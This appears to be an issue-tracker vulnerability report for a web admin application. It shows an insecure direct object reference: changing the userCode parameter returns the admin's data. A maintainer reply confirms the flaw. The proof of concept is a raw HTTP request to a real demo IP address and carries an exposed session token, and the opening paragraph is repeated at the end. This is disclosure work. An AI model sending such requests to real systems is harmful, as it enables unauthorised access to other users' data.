Log in with user1 account on the trial website given by the author, and click the personal center to capture the package.
The userCode parameter has a vulnerability.
poc:
user1 login --> /api/user/userData?userCode=admin
GET /api/user/userData?userCode=admin HTTP/1.1
Host: 8.129.86.120
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
myadmin-token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
Connection: close
Referer: http://8.129.86.120/
Cookie: sidebarStatus=1; myadmin-token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
This problem does exist. In this case, the userCode should be parsed and obtained from the token, rather than passed through parameters. thanks for reminding.
Log in with user1 account on the trial website given by the author, and click the personal center to capture the package. The userCode parameter has a vulnerability. poc: user1 login --> /api/user/userData?userCode=admin